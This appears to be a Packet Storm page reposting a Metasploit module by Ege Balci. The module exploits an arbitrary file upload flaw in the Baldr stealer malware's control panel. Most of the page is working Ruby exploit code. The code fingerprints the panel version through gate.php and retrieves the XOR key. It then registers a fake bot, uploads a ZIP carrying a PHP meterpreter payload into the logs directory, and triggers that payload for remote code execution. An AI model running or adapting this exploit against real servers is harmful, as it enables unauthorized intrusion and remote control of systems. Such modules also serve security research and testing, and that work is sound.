exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Baldr Botnet Panel Shell Upload

Baldr Botnet Panel Shell Upload
Posted Jul 29, 2020
Authored by Ege Balci | Site metasploit.com

This Metasploit module exploits a arbitrary file upload vulnerability within the Baldr stealer malware control panel. Attackers can turn this vulnerability into remote code execution by adding malicious PHP code inside the victim logs ZIP file and registering a new bot to the panel by uploading the ZIP file under the logs directory. On versions 3.0 and 3.1 victim logs are ciphered by a random 4 byte XOR key. This exploit module retrieves the IP specific XOR key from panel gate and registers a new victim to the panel with adding the selected payload inside the victim logs.

tags | exploit, remote, arbitrary, php, code execution, file upload
SHA-256 | eead6190f3debc909c6e03fa4150c29da6936794b738a1702f89596b906fc97f
Download | Favorite | View

Baldr Botnet Panel Shell Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Baldr Botnet Panel Shell Upload Exploit',
        'Description' => %q{
          This module exploits a arbitrary file upload vulnerability within the Baldr
          stealer malware control panel. Attackers can turn this vulnerability into
          an RCE by adding a malicious PHP code inside the victim logs ZIP file and
          registering a new bot to the panel by uploading the ZIP file under logs
          directory. On versions 3.0 and 3.1 victim logs are ciphered by a random 4
          byte XOR key.

          This exploit module retrieves the IP spesific XOR key from panel gate
          and registers a new victim to the panel with adding the selected payload
          inside the victim logs.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Ege Balcı <egebalci@pm.me>' # author & msf module
          ],
        'References' =>
          [
            ['URL', 'https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/'],
            ['URL', 'https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/'],
            ['URL', 'https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf'],
          ],
        'DefaultOptions' =>
          {
            'SSL' => false,
            'WfsDelay' => 5
          },
        'Platform' => [ 'php' ],
        'Arch' => [ ARCH_PHP ],
        'Targets' =>
          [
            [
              'Auto',
              {
                'Platform' => 'PHP',
                'Arch' => ARCH_PHP,
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
              }
            ],
            [
              '<= v2.0',
              {
                'Platform' => 'PHP',
                'Arch' => ARCH_PHP,
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
              }
            ],
            [
              'v2.2',
              {
                'Platform' => 'PHP',
                'Arch' => ARCH_PHP,
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
              }
            ],
            [
              'v3.0 & v3.1',
              {
                'Platform' => 'PHP',
                'Arch' => ARCH_PHP,
                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
              }
            ]
          ],
        'Privileged' => false,
        'DisclosureDate' => 'Dec 19 2018',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
      ]
    )
  end

  def check
    if select_target
      Exploit::CheckCode::Appears("Baldr Version: #{select_target.name}")
    else
      Exploit::CheckCode::Safe
    end
  end

  def select_target
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'gate.php')
    )
    if res && res.code == 200
      if res.body.include?('~;~')
        targets[3]
      elsif res.body.include?(';')
        targets[2]
      elsif res.body.size < 4
        targets[1]
      end
    end
  end

  def exploit
    # Forge the payload
    name = ".#{Rex::Text.rand_text_alpha(4)}"
    files =
      [
        { data: payload.encoded, fname: "#{name}.php" }
      ]
    zip = Msf::Util::EXE.to_zip(files)
    hwid = Rex::Text.rand_text_alpha(8).upcase

    gate_uri = normalize_uri(target_uri.path, 'gate.php')
    version = select_target
    # If not 'Auto' then use the selected version
    if target != targets[0]
      version = target
    end

    gate_res = send_request_cgi({
      'method' => 'GET',
      'uri' => gate_uri
    })
    os = Rex::Text.rand_text_alpha(8..12)

    case version
    when targets[3]
      fail_with(Failure::NotFound, 'Failed to obtain response') unless gate_res
      unless gate_res.code != 200 || gate_res.body.to_s.include?('~;~')
        fail_with(Failure::UnexpectedReply, 'Could not obtain gate key')
      end
      key = gate_res.body.to_s.split('~;~')[0]
      print_good("Key: #{key}")

      data = "hwid=#{hwid}&os=#{os}&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
      data = Rex::Text.xor(key, data)

      res = send_request_cgi({
        'method' => 'GET',
        'uri' => gate_uri,
        'data' => data.to_s
      })

      fail_with(Failure::UnexpectedReply, 'Could not obtain gate key') unless res && res.code == 200
      print_good('Bot successfully registered.')

      data = Rex::Text.xor(key, zip.to_s)
      form = Rex::MIME::Message.new
      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"#{hwid}.zip\"")

      res = send_request_cgi({
        'method' => 'POST',
        'uri' => gate_uri,
        'ctype' => "multipart/form-data; boundary=#{form.bound}",
        'data' => form.to_s
      })

      if res && res.code == 200
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
        register_file_for_cleanup("#{name}.php")
      else
        print_error("Server responded with code #{res.code}")
        fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
      end
    when targets[2]
      fail_with(Failure::NotFound, 'Failed to obtain response') unless gate_res
      unless gate_res.code != 200 || gate_res.body.to_s.include?('~;~')
        fail_with(Failure::UnexpectedReply, 'Could not obtain gate key')
      end

      key = gate_res.body.to_s.split(';')[0]
      print_good("Key: #{key}")
      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
      data << zip.to_s
      result = Rex::Text.xor(key, data)

      res = send_request_cgi({
        'method' => 'POST',
        'uri' => gate_uri,
        'data' => result.to_s
      })

      unless res && res.code == 200
        print_error("Server responded with code #{res.code}")
        fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
      end

      print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
    else
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => gate_uri,
        'data' => zip.to_s,
        'encode_params' => true,
        'vars_get' => {
          'hwid' => hwid,
          'os' => os,
          'cookie' => '0',
          'pswd' => '0',
          'credit' => '0',
          'wallet' => '0',
          'file' => '1',
          'autofill' => '0',
          'version' => 'v2.0'
        }
      })

      if res && res.code == 200
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}")
        fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
      end
    end

    vprint_status('Triggering payload')
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'logs', hwid, "#{name}.php")
    }, 3)
  end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close